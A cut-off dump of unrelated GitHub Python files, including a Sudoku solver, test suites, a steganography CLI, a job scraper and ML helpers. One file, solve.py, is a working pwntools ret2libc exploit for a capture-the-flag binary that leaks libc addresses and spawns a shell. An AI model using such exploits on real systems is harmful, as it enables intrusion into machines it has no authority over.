list(equal_entry) != self.possible[coordinate]\n and number in self.possible[coordinate]\n ):\n self.possible[coordinate].remove(number)\n\n if (\n isinstance(self.possible[coordinate], list)\n and len(self.possible[coordinate]) == 1\n ):\n new_true = self.possible[coordinate][0]\n self.table.row_to_numbers[coordinate[0]].append(new_true)\n self.table.column_to_numbers[coordinate[1]].append(new_true)\n\n if (\n new_true\n not in self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ]\n ):\n self.table.square_to_numbers[\n self.table.coordinate_to_square[coordinate]\n ].append(new_true)\n\n self.possible[coordinate] = new_true\n self.table.set_field(coordinate[0], coordinate[1],\n new_true)\n\n def check_single_elements_in_column(self):\n \"\"\"\n Checks for numbers that are only possible in one cell of a column and\n sets this cell to this number.\n \"\"\"\n possible_columns = []\n for column in range(len(self.table.columns)):\n possible_columns.append([])\n for row in range(len(self.table.rows)):\n values = self.possible[(row, column)]\n possible_columns[column].append(values if isinstance(values, list) else [values])\n\n for column, poss_col in enumerate(possible_columns):\n for row, possible in enumerate(poss_col):\n for number in possible:\n if not any([number in poss for count, poss in enumerate(poss_col) if count != row]):\n self.table.row_to_numbers[row].append(number)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[(row, column)]\n ].append(number)\n\n if number not in self.table.column_to_numbers[column]:\n self.table.column_to_numbers[column].append(number)\n\n self.possible[(row, column)] = number\n self.table.set_field(row, column, number)\n\n def check_single_elements_in_row(self):\n \"\"\"\n Checks for numbers that are only possible in one cell of a row and\n sets this cell to this number.\n \"\"\"\n possible_rows = []\n for row in range(len(self.table.rows)):\n possible_rows.append([])\n for col in range(len(self.table.columns)):\n values = self.possible[(row, col)]\n possible_rows[row].append(values if 
isinstance(values, list) else [values])\n\n for row, poss_row in enumerate(possible_rows):\n for col, possible in enumerate(poss_row):\n for number in possible:\n if not any([number in poss for count, poss in enumerate(poss_row) if count != col]):\n self.table.column_to_numbers[col].append(number)\n self.table.square_to_numbers[\n self.table.coordinate_to_square[(row, col)]\n ].append(number)\n\n if number not in self.table.column_to_numbers[col]:\n self.table.row_to_numbers[row].append(number)\n\n self.possible[(row, col)] = number\n self.table.set_field(row, col, number)\n\n def check_table_validity(self):\n \"\"\"\n Checks whether a resulting table is a valid Sudoku table.\n :return:\n \"\"\"\n for row in self.table.rows:\n if len(row) != 9 or set(row) != {1,2,3,4,5,6,7,8,9}:\n print(row)\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check rows of table.\")\n for col in self.table.columns:\n if len(col) != 9 or set(col) != {1,2,3,4,5,6,7,8,9}:\n print(col)\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check columns of table.\")\n\n count_results = Counter(self.possible.values())\n for count in list(count_results.values()):\n if count != 9:\n raise Exception(\"The sudoku table is not valid. Improve your \"\n \"algorithm. Check possible dictionary.\")\n\n def print_resulting_table(self):\n line_count = 0\n square_count = 0\n for coord, value in self.possible.items():\n print(\"{}\".format(str(value)), end=\" \")\n line_count += 1\n square_count += 1\n if square_count > 2:\n print(\" \", end=\"\")\n square_count = 0\n if line_count > 8:\n print()\n line_count = 0\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"sudoku_file\", nargs=\"+\")\n\n args = parser.parse_args()\n\n for sudoku_file in args.sudoku_file:\n table = SudokuTable(sudoku_file)\n\n print(sudoku_file)\n print()\n table.print_table()\n print()\n\n solver = SudokuSolver(table)\n\n solver.solve()\n print()\n","repo_name":"janniss91/SudokuSolver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":16688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72660768536","text":"import pygame\nimport random\nimport math\nfrom mine import Mine\n\n\nclass Worker:\n def __init__(self, building, color = (1,1,123)):\n self.color = color\n self.SPEED = 1000\n self.current = building\n self.destination = building\n self.dif_x = 0\n self.dif_y = 0\n self.pos = building.pos.copy()\n\n self.notification = False\n\n self.img = pygame.image.load('assets\\worker_red.png').convert()\n self.mineral = None\n\n\n def next(self):\n self.current = self.destination\n \n try:\n self.destination = random.choice(self.current.cons)\n except IndexError:\n if(not self.notification):\n print(\"Add another node\")\n self.notification = True\n\n self.dif_x = self.destination.pos[0]-self.pos[0]\n self.dif_y = self.destination.pos[1]-self.pos[1]\n \n def goto(self, building):\n self.destination = building\n self.pos = self.destination.pos.copy()\n self.next()\n\n def walk(self):\n \n if (math.dist(self.pos, self.destination.pos)<10):\n self.next()\n\n self.pos[0] += self.dif_x/self.SPEED\n self.pos[1] += self.dif_y/self.SPEED\n\n \n def draw(self, win, zoom, win_x, win_y):\n win.blit( #img\n pygame.transform.scale(self.img, (int(16*zoom),int(16*zoom))),\n (#pos\n (self.pos[0]-win_x)*zoom-8*zoom, \n (self.pos[1]-win_y)*zoom-8*zoom\n )\n 
)\n\n","repo_name":"Lennart4711/CaMS","sub_path":"src/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"72986299737","text":"# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\nclass Solution:\n    def flatten(self, root: TreeNode) -> None:\n        if not root: return\n\n        self.flatten(root.left)\n        self.flatten(root.right)\n\n        # post-order traversal position\n        # 1. the left and right subtrees have already been flattened into lists\n        left = root.left\n        right = root.right\n        # 2. make the left subtree the new right subtree\n        root.left = None\n        root.right = left\n        # 3. attach the original right subtree to the tail of the current right subtree\n        p = root\n        # walk down to the tail of the right subtree\n        while p.right is not None: p = p.right\n        # connect\n        p.right = right\n\n","repo_name":"JackeyGuo/Algorithms","sub_path":"Leetcode/二叉树/114-二叉树展开为链表-m.py","file_name":"114-二叉树展开为链表-m.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"}
{"seq_id":"30992874494","text":"'''The list of temperatures in Mons, Belgium, was stored in the list T =\n[-10,-9,0,1,2,5,-2,-4]. Write a program that prints the lowest and the highest temperature,\nas well as the average temperature, using functions.'''\n\ndef menor(lista):\n    if len(lista) != 0:\n        menor = lista[0]\n        for i in range(0, len(lista)):\n            if lista[i] <= menor:\n                menor = lista[i]\n        return menor\n\ndef maior(lista):\n    if len(lista) != 0:\n        maior = lista[0]\n        for i in range(0, len(lista)):\n            if lista[i] >= maior:\n                maior = lista[i]\n        return maior\n\ndef media(lista):\n    if len(lista) != 0:\n        soma = 0\n        for i in range(0, len(lista)):\n            soma += lista[i]\n        media = soma / len(lista)\n        return media\n\nlista = [-10,-9,0,1,2,5,-2,-4]\nmaior(lista)\nmenor(lista)\nmedia(lista)\nif len(lista) != 0:\n    if maior(lista) == menor(lista):\n        print(f\"the highest {maior(lista)} and lowest {menor(lista)} temperatures are equal, and the average temperature was {media(lista)}°C\")\n    else:\n        print(f\"The lowest temperature is {menor(lista)}°C and the highest is {maior(lista)}°C, and the average temperature was {media(lista)}°C\")\nelse:\n    print(\"empty list\")\n","repo_name":"Gabriel-Angelo-Silva/Lista-de-Exercicios","sub_path":"atividade5.py","file_name":"atividade5.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"24055294497","text":"from tessia.baselib.hypervisors.kvm.iface import Iface\nfrom tessia.baselib.hypervisors.kvm.target_device_manager \\\n    import TargetDeviceManager\nfrom unittest import mock\nfrom unittest import TestCase\n\n#\n# CONSTANTS AND DEFINITIONS\n#\nIFACE_PARAMS = {\n    \"attributes\": {\n        \"libvirt\": \"some xml\"\n    }\n}\n\n#\n# CODE\n#\nclass TestIface(TestCase):\n    \"\"\"\n    Class for testing of Ifaces.\n    \"\"\"\n    def setUp(self):\n        \"\"\"\n        Setup and create mock objects used in the tests.\n        \"\"\"\n        self._mock_tgt_dv_mngr = mock.Mock(spec=TargetDeviceManager)\n    # setUp()\n\n    def _create_iface(self, parameters):\n        \"\"\"\n        Auxiliary method to create an iface.\n        \"\"\"\n        return Iface(parameters, self._mock_tgt_dv_mngr)\n    # _create_iface()\n\n    def test_init_invalid_type(self):\n        \"\"\"\n        Test the case where an invalid interface type is specified.\n        \"\"\"\n        iface_params = {\n            'attributes': {'hostiface': 'eth0'},\n            'mac_address': 'aa:bb:cc:dd:ee:ff',\n            'type': 'invalid',\n        }\n        with self.assertRaises(ValueError):\n            self._create_iface(iface_params)\n    # 
test_init_invalid_type()\n\n def test_to_xml(self):\n \"\"\"\n Test iface creation with a xml provided as parameter.\n \"\"\"\n iface = self._create_iface(IFACE_PARAMS)\n\n # validate proper initialization\n self.assertIs(iface._libvirt_xml,\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n self.assertIs(iface._parameters, IFACE_PARAMS)\n self._mock_tgt_dv_mngr.update_devno_blacklist.assert_called_with(\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n\n # validate the xml provided was used\n iface = self._create_iface(IFACE_PARAMS)\n self.assertIs(iface.to_xml(),\n IFACE_PARAMS.get(\"attributes\").get(\"libvirt\"))\n # test_to_xml()\n\n @mock.patch(\"tessia.baselib.hypervisors.kvm.iface.open\",\n create=True)\n def test_to_xml_read_template(self, mock_open):\n \"\"\"\n Test the case that the libvirt xml is not provided and must\n be generated.\n \"\"\"\n template_file = mock_open().__enter__.return_value.read.return_value\n iface_params = {\n 'attributes': {'hostiface': 'eth0'},\n 'mac_address': 'aa:bb:cc:dd:ee:ff',\n 'type': 'MACVTAP',\n }\n iface = self._create_iface(iface_params)\n\n self.assertIs(\n iface.to_xml(),\n template_file.format.return_value)\n\n template_file.format.assert_called_with(\n mac=iface_params['mac_address'],\n devno=self._mock_tgt_dv_mngr.get_valid_devno.return_value,\n hostiface=iface_params['attributes']['hostiface'])\n # test_to_xml_reading_template()\n# TestIface\n","repo_name":"tessia-project/tessia-baselib","sub_path":"tests/unit/hypervisors/kvm/iface.py","file_name":"iface.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"6507079500","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 12 16:14:25 2019\r\nby Jeffrey Mc Hugh\r\nmchughj3@tcd.ie\r\n\r\n@author: jm2080\r\n\"\"\"\r\n\r\nimport os\r\nimport glob\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport file_dialog2 as fd\r\nimport TDMSfns2 as tdm\r\n\r\nplt.close('all')\r\n\r\nindir = fd.filedlg(\"C:/\", \"Choose folder of tdms files\")\r\npath = glob.glob(indir + '/' + '*_video_tweezers_*.tdms')\r\ninsavepath = fd.filedlg(\"C:/\", \"Choose save location\")\r\nsavepath = insavepath + '/'\r\n\r\nSSFkeyvals = []\r\nPkFvals = []\r\nd = []\r\n\r\ni = len(path)\r\nn = 0\r\n\r\nwhile n < i:\r\n\r\n plt.close('all')\r\n \r\n name = os.path.basename(path[n])\r\n s1 = name.split('_')[0]\r\n s2 = name.split('_')[3].split('.')[0]\r\n \r\n tdms_file = path[n]\r\n dataPt = tdm.tdmsLoad(tdms_file, 'Position Data', 'Time')\r\n #converts the contents from lists to numpy arrays\r\n if np.amin(dataPt) < 1.0e-02: \r\n dataPt[np.argmin(dataPt):np.size(dataPt)] += dataPt[np.argmin(dataPt)-1]\r\n #zero each time channel\r\n tmin = np.amin(dataPt)\r\n relt = dataPt - tmin\r\n delt = relt[1] - relt[0]\r\n \r\n dataPx = tdm.tdmsLoad(tdms_file, 'Position Data', 'x-pos')\r\n #convert pixels to nm, 1 pixel = 214.56 nm\r\n dataPxnm = dataPx * 214.56\r\n #convert to force knowing laser power and using calibration curve\r\n Fx = dataPxnm * 0.08\r\n Fx = np.ma.array(Fx, mask=np.isnan(Fx))\r\n Fmax = np.amax(Fx)\r\n relFx = Fx - Fx[0]\r\n \r\n dataPy = tdm.tdmsLoad(tdms_file, 'Position Data', 'y-pos')\r\n dataPynm = dataPy * 214.56\r\n Fy = dataPynm * 0.08\r\n Fy = np.ma.array(Fy, mask=np.isnan(Fy))\r\n Fymax = np.amax(Fy)\r\n relFy = Fy - Fy[0]\r\n \r\n puldat = tdms_file\r\n pulname = puldat.split('/')[-1]\r\n pultime = pulname.split('_')[3].split('.')[0]\r\n puldate = 
pulname.split('_')[0]\r\n pulfldr = puldat.split('/')[-2]\r\n \r\n #These are the \"Tableau 20\" colors as RGB. \r\n tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \r\n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \r\n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \r\n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \r\n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \r\n \r\n #Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \r\n for z in range(len(tableau20)): \r\n r, g, b = tableau20[z] \r\n tableau20[z] = (r / 255., g / 255., b / 255.)\r\n \r\n relt = relt.reshape(relt.size, 1)\r\n relFx = relFx.reshape(relFx.size, 1)\r\n relFy = relFy.reshape(relFy.size, 1)\r\n relF = np.sqrt(np.square(relFx) + np.square(relFy))\r\n relF = relF.reshape(relF.size, 1)\r\n farr = np.concatenate((relt, relFx, relFy, relF),axis=1)\r\n ssrelF = np.mean(relF[-20000:-10000], axis=0)\r\n relFmax = np.amax(relF)\r\n stedstr = \"Steady State Force = \" + str(np.round(ssrelF, 3))[1:-1] + '\\n' + \"Peak Force = \" + str(np.round(relFmax, 3))\r\n \r\n SSFkeyvals.append(ssrelF[0])\r\n PkFvals.append(relFmax)\r\n \r\n fignuj = plt.figure(figsize=(12.6, 9.72))\r\n axnuj = fignuj.add_subplot(111)\r\n axnuj.set_xlabel('Time (s)', fontname='Arial', fontsize=28)\r\n axnuj.set_ylabel('Force (pN)', fontname='Arial', fontsize=28)\r\n axnuj.plot(relt, relF, color=tableau20[6], linewidth=2.0, label=stedstr)\r\n axnuj.legend(loc='best', fancybox=True, fontsize=12, framealpha=0.5)\r\n axnuj.locator_params(nbins=6)\r\n axnuj.tick_params(direction='in', length=7, width=2)\r\n axnuj.xaxis.set_ticks_position('both')\r\n axnuj.yaxis.set_ticks_position('both')\r\n for tick in axnuj.get_xticklabels():\r\n tick.set_fontname('Arial')\r\n for tick in axnuj.get_xticklabels():\r\n tick.set_fontsize(28)\r\n for tick in axnuj.get_yticklabels():\r\n tick.set_fontname('Arial')\r\n for tick in axnuj.get_yticklabels():\r\n tick.set_fontsize(28)\r\n for axis in ['top','bottom','left','right']:\r\n axnuj.spines[axis].set_linewidth(2)\r\n fignuj.savefig(savepath+\"NeuronPullCurve_\"+str(s1)+\"_\"+str(s2)+\".jpg\", bbox_inches='tight', dpi=75)\r\n\r\n d.append({'Timestamp' : str(s1)+\"_\"+str(s2),\r\n 'SS Force' : ssrelF[0],\r\n 'Pk Force' : relFmax,\r\n })\r\n \r\n plt.close('all')\r\n\r\n n = n + 1\r\nForceDat = pd.DataFrame(d)\r\n\r\nprint('Data analysed!')","repo_name":"mchughj33/mem-tension","sub_path":"cellForce_analyser_neuron_v3.py","file_name":"cellForce_analyser_neuron_v3.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26981301645","text":"#!/usr/bin/env python\n\"\"\"\nBPCS Steganography: encoding/decoding messages hidden in a vessel image\n\nSource: http://web.eece.maine.edu/~eason/steg/SPIE98.pdf\n\nBEHAVIORS:\n encoding\n * expects a vessel image file, message file, and alpha value\n * hides the contents of a file inside a vessel image\n decoding\n * expects a vessel image file, and alpha value\n * recovers the message stored inside a vessel image\n capacity\n * expects a vessel image file and alpha value\n * assesses the maximum size of a message that could be encoded within the vessel image\n test\n * runs the unit tests\n\n\"\"\"\nimport os.path\nimport argparse\n\nfrom .bpcs_steg_decode import decode\nfrom .bpcs_steg_encode import encode\nfrom .bpcs_steg_capacity import capacity\nfrom 
.bpcs_steg_test import test_all\n\n__author__ = \"Jay Hennig\"\n__license__ = \"MIT\"\n__email__ = \"mobeets@gmail.com\"\n\nparser = argparse.ArgumentParser()\n\nvalid_opt_behaviors = {\n 'encode': ['infile', 'messagefile', 'alpha'],\n 'decode': ['infile', 'outfile', 'alpha'],\n 'capacity': ['infile', 'outfile', 'alpha'],\n 'test': []\n }\n\nparser.add_argument('behavior', type=str, help='interaction modes: {0}'.format(valid_opt_behaviors.keys()))\nparser.add_argument('-i', '--infile', type=str, help='path to vessel image (.png)')\nparser.add_argument('-o', '--outfile', type=str, help='path to write output file')\nparser.add_argument('-m', '--messagefile', type=str, help='path to message file')\nparser.add_argument('-a', '--alpha', type=float, help='complexity threshold', default=0.45)\nopts = parser.parse_args()\n\ndef check_file_exists(filename):\n if not os.path.exists(filename):\n parser.error('The file \"{0}\" could not be found.'.format(filename))\n\nif opts.behavior == 'decode':\n check_file_exists(opts.infile)\n decode(opts.infile, opts.outfile, opts.alpha)\nelif opts.behavior == 'encode':\n check_file_exists(opts.infile)\n check_file_exists(opts.messagefile)\n encode(opts.infile, opts.messagefile, opts.outfile, opts.alpha)\nelif opts.behavior == 'capacity':\n check_file_exists(opts.infile)\n capacity(opts.infile, alpha=opts.alpha, outfile=opts.outfile)\nelif opts.behavior == 'test':\n test_all()\n","repo_name":"mobeets/bpcs","sub_path":"bpcs/bpcs.py","file_name":"bpcs.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"17533558899","text":"import pytest\n\n\n@pytest.fixture(scope='session')\ndef setup():\n \"\"\"\n There is no setup required for the server 'reqres' as these are opensource API.\n But just for future enhancements keeping this setup file in the conftest.\n \"\"\"\n print(\"Started the execution..\")\n base_url = \"https://reqres.in/api/users\"\n yield\n print(\" Automation execution is completed..!\")\n","repo_name":"mayursonawane051/API-_using_the_Pytest_framework","sub_path":"reqres/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25729321851","text":"from jsonschema import validate, ValidationError\nfrom datetime import datetime\n\ndef str2date(date_string):\n # e.g. 
date_string -- 2014-10-28T00:00:00Z\n return datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%SZ')\n\nscpp_schema = {\n \"type\" : \"object\",\n \"properties\" : {\n \"customerId\" : {\"type\" :\"string\"},\n \"startTime\" : {\"type\" : \"string\"},\n \"endTime\" : {\"type\":\"string\"},\n \"volume\" : {\"type\":\"number\"}\n }\n }\n\ndef validate_scpp_msg(scpp_msg):\n \"\"\"Validate an scpp msg according to the json schema and common sense (start date < end date)\"\"\"\n\n validate(scpp_msg, scpp_schema)\n startTime = str2date(scpp_msg[\"startTime\"])\n endTime = str2date(scpp_msg[\"endTime\"])\n if startTime >= endTime:\n raise ValidationError(\"Start time {0} should be before end time {1}\".format(scpp_msg[\"startTime\"], scpp_msg[\"endTime\"]))\n\ntariff_schema = {\n \"type\" : \"object\",\n \"properties\" : {\n \"startFee\": {\"type\" : \"number\"},\n \"hourlyFee\": {\"type\" : \"number\"},\n \"feePerKWh\": {\"type\" : \"number\"},\n \"activeStarting\": {\"type\" : \"string\"}\n }\n }\n\ndef validate_tariff_msg(tariff_msg, last_active_starting):\n \"\"\"Validate a tariff msg according to 1) the json schema \n 2) tariff's active starting ts > last active starting ts\n 3) tariff's active starting ts must be in the future\n \"\"\"\n\n validate(tariff_msg, tariff_schema)\n if last_active_starting is not None and last_active_starting >= tariff_msg['activeStarting']:\n raise ValidationError(\"activeStarting {0} is before last tariff's active starting date {1}!\"\n .format(tariff_msg['activeStarting'], last_active_starting))\n if str2date(tariff_msg['activeStarting']) < datetime.now():\n raise ValidationError(\"activeStarting {0} cannot be before current time!\"\n .format(tariff_msg['activeStarting'], last_active_starting))\n\n","repo_name":"goroglev/Levente-Karoly-Gorog","sub_path":"Backoffice client-server python/app/json_schemas.py","file_name":"json_schemas.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25766008128","text":"from pwn import *\nfrom warnings import filterwarnings\n\n# Allows you to switch between local/GDB/remote from terminal\ndef start(argv=[], *a, **kw):\n if args.GDB: # Set GDBscript below\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n elif args.REMOTE: # ('server', 'port')\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else: # Run locally\n return process([exe] + argv, *a, **kw)\n\n# Specify GDB script here (breakpoints etc)\ngdbscript = '''\ninit-pwndbg\nbreakrva 0x000000000000133b\ncontinue\n'''.format(**locals())\n\n# Binary filename\nexe = './simpler_patched'\nelf = context.binary = ELF(exe, checksec=False)\ncontext.log_level = 'info'\nfilterwarnings(\"ignore\")\n\n# ===========================================================\n# EXPLOIT GOES HERE\n# ===========================================================\n\nio = start()\nlibc = elf.libc\n\n# ===========================================================\n# Leak ELF Section\n# ===========================================================\n\nio.recvuntil('here:')\nio.sendline('sh'+'a'*29)\nio.recvuntil('a\\n')\nleak = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\nelf.address = leak - (0x557c0d4a2221- 0x557c0d4a1000)\nlog.info(\"Leaked Address: %#x\", leak)\nlog.info(\"ELF Base Address: %#x\", elf.address)\n\n# ===========================================================\n# ELF Gadgets\n# ===========================================================\n\npop_rdi = elf.address + 
0x00000000000011ee # pop rdi; ret; \nxor_rsi = elf.address + 0x00000000000011f0 # xor rsi, rsi; ret; \nxor_rdx = elf.address + 0x00000000000011f4 # xor rdx, rdx; ret; \npop_rax = elf.address + 0x00000000000011ec # pop rax; ret; \nret = elf.address + 0x000000000000101a # ret; \nsyscall = elf.address + 0x00000000000011e9 # syscall; ret; \n\n# ===========================================================\n# Ret2Libc\n# ===========================================================\n\noffset = 56\n\npayload = flat({\n    offset: [\n        elf.sym['notcalled'],\n        pop_rdi,\n        elf.got['printf'],\n        elf.plt['printf'],\n        elf.address + 0x1231\n    ]\n})\n\nio.sendline(payload)\n# io.recv()\nprintf = unpack(io.recv()[:6].ljust(8, b\"\\x00\"))\nlibc.address = printf - libc.sym['printf']\ninfo(\"Leaked Printf Address: %#x\", printf)\ninfo(\"Libc Base Address: %#x\", libc.address)\n\nsh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\ninfo('/bin/sh: %#x', sh)\ninfo('system: %#x', system)\n\npayload = flat({\n    offset: [\n        elf.sym['notcalled'],\n        pop_rdi,\n        sh,\n        system\n    ]\n})\n\nio.sendline('a')\nio.sendline(payload)\nio.interactive()\n","repo_name":"h4ckyou/h4ckyou.github.io","sub_path":"posts/ctf/cyberlympics22/prequal/Robin/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"}
{"seq_id":"4851707297","text":"# Transfer changedon/timestamp to datetime.\r\n# According to datetime, write each record that belongs to a specific minute to a file named as month+day+hour+minute.\r\n\r\nimport os\r\nimport json\r\nimport datetime\r\nimport multiprocessing\r\n\r\ndef perminute(i):\r\n    with open(\"split/\"+i) as f:\r\n        a = f.readlines()\r\n    for line in a:\r\n        data = json.loads(line)\r\n        temp = {}\r\n        temp[\"hmacaddress\"] = data[\"hmacaddress\"]\r\n        temp[\"building\"] = data[\"building\"]\r\n        temp_json = json.dumps(temp)\r\n        temp_line = str(temp_json)+\"\\n\"\r\n\r\n        ts = int(data[\"changedon\"]) + 36000\r\n        dateArray = datetime.datetime.fromtimestamp(ts)\r\n        dateStr = str(dateArray)  # e.g. '2019-09-12 16:14:25'\r\n        filename = dateStr[5:7]+dateStr[8:10]+dateStr[11:13]+dateStr[14:16]\r\n\r\n        with open('PerMinute/'+filename, 'a') as o:\r\n            o.writelines(temp_line)\r\n\r\n\r\npool = multiprocessing.Pool(8)\r\n\r\ndic = (os.listdir(\"split\"))\r\nfor file in dic:\r\n    pool.apply_async(perminute, (file,))\r\n\r\npool.close()\r\npool.join()\r\n","repo_name":"ylli1/wifitrack-project","sub_path":"PerMinutePerFile.py","file_name":"PerMinutePerFile.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"73517694938","text":"import tensorflow as tf\nfrom tensorflow.python.keras.losses import binary_crossentropy\n\n\n### LOSS FUNCTIONS ###\n\n\ndef dice_coeff(y_true, y_pred):\n    smooth = 1.\n    # Flatten\n    y_true_f = tf.reshape(y_true, [-1])\n    y_pred_f = tf.reshape(y_pred, [-1])\n    intersection = tf.reduce_sum(y_true_f * y_pred_f)\n    score = ((2. 
* intersection + smooth) /\n (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f) + smooth))\n return score\n\n\ndef dice_loss(y_true, y_pred):\n loss = 1 - dice_coeff(y_true, y_pred)\n return loss\n\n\ndef bce_dice_loss(y_true, y_pred):\n loss = binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)\n return loss\n","repo_name":"cmalinmayor/baby_fork","sub_path":"build/lib/baby/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1125056673","text":"import sys\nimport os\n\nimport gen_graphs as gg\nfrom recast_base import *\n\n\nif __name__ == '__main__':\n # these are hardcoded info\n # you don't need to change them\n python_file = 'gen_graphs.py'\n p_rnd = [1e-2, 1e-3, 1e-4, 1e-5, 1e-6,]\n\n # python src/gen_graphs.py filename\n if (len(sys.argv) < 2):\n s = 'python recast_edgelist.py trace'\n sys.exit (s)\n\n filename = sys.argv[1]\n path = os.path.split(filename)[0]\n trace_name = os.path.split(filename)[1].split('.')[0]\n \n sys.argv = [python_file, filename]\n\n gg.main()\n\n ep = get_ep(gg)\n random_ep = get_random_ep(gg)\n to = get_to(gg)\n random_to = get_random_to(gg)\n\n (friends, bridges, acquaintance, random) = map_relations(ep, random_ep, to, random_to, p_rnd)\n\n folder = 'recast_class' + os.sep + trace_name\n folder_images = 'images' + os.sep + 'recast' + os.sep + trace_name + os.sep\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n if not os.path.exists(folder_images):\n os.makedirs(folder_images)\n \n plot_clustering(gg.temporal_graphs,\n gg.random_graphs,\n fname=folder_images + os.sep + 'cc.eps',\n name=trace_name)\n plot_ep(ep, random_ep, fname=folder_images + os.sep + 'ep.eps', trace_name=trace_name)\n plot_to(to, random_to, fname=folder_images + os.sep + 'to.eps', trace_name=trace_name)\n plot_relations(p_rnd, friends, bridges, acquaintance, random, fname=folder_images + os.sep + 'rel.eps', \n trace_name=trace_name)\n\n save_edges(gg, ep, random_ep, to, random_to, p_rnd, fname= folder + os.sep, ext='.txt')\n","repo_name":"guilhermeleobas/recastd","sub_path":"python/recast_edgelist.py","file_name":"recast_edgelist.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"32881351212","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'}\ndef last_so_page(url):\n result = requests.get(url,headers = headers)\n soup = BeautifulSoup(result.text,'html.parser')\n pages = soup.find('div',{'class':'s-pagination'}).find_all('a',{'class':'s-pagination--item'})\n max_page = pages[-2].get_text(strip=True)\n return max_page\n\ndef get_so_job(soup):\n info_dict = []\n item_box = soup.find('div', {'class': 'listResults'}).find_all('div', {'class': 'd-flex'})\n for item in item_box:\n url = \"https://stackoverflow.com/jobs/\"\n dict = {}\n title = item.find('a',{'s-link stretched-link'})\n name = item.find('h3', {'class': 'fc-black-700 fs-body1 mb4'})\n links = item.find('div')\n try:\n titles = title.text\n link = url + links['data-jobid']\n companies, location = name.find_all('span', recursive=True)\n company_name = companies.get_text(strip=True)\n location_name = location.get_text(strip=True)\n dict = {'title':titles,\n 'comapny':company_name,\n 'location':location_name,\n 'link':link}\n 
info_dict.append(dict)\n except:\n pass\n return info_dict\n\n\ndef extract_so_jobs(last,url):\n jobs = []\n for i in range(1,int(last)+1):\n result = requests.get(f\"{url}&pg={i+1}\",headers=headers)\n soup = BeautifulSoup(result.text, 'html.parser')\n jobs_info = get_so_job(soup)\n for job in jobs_info:\n jobs.append(job)\n return jobs\n\ndef get_so_jobs(word):\n url = f\"https://stackoverflow.com/jobs?r=true&q={word}\"\n last_page = last_so_page(url)\n jobs = extract_so_jobs(last_page,url)\n return jobs","repo_name":"ankiyong/MultiScrapper","sub_path":"so.py","file_name":"so.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14714522417","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Load the 'tips' dataset from Seaborn\ndf = sns.load_dataset('tips')\n\n# Basic info\ndf.info()\n\n# Descriptive statistics\ndf.describe()\n\n# Check for missing values\ndf.isnull().sum()\n\n# Pairplot to visualize relationships\nsns.pairplot(df, hue=\"time\") # 'time' is a column in the 'tips' dataset\nplt.show()\n\n# Select 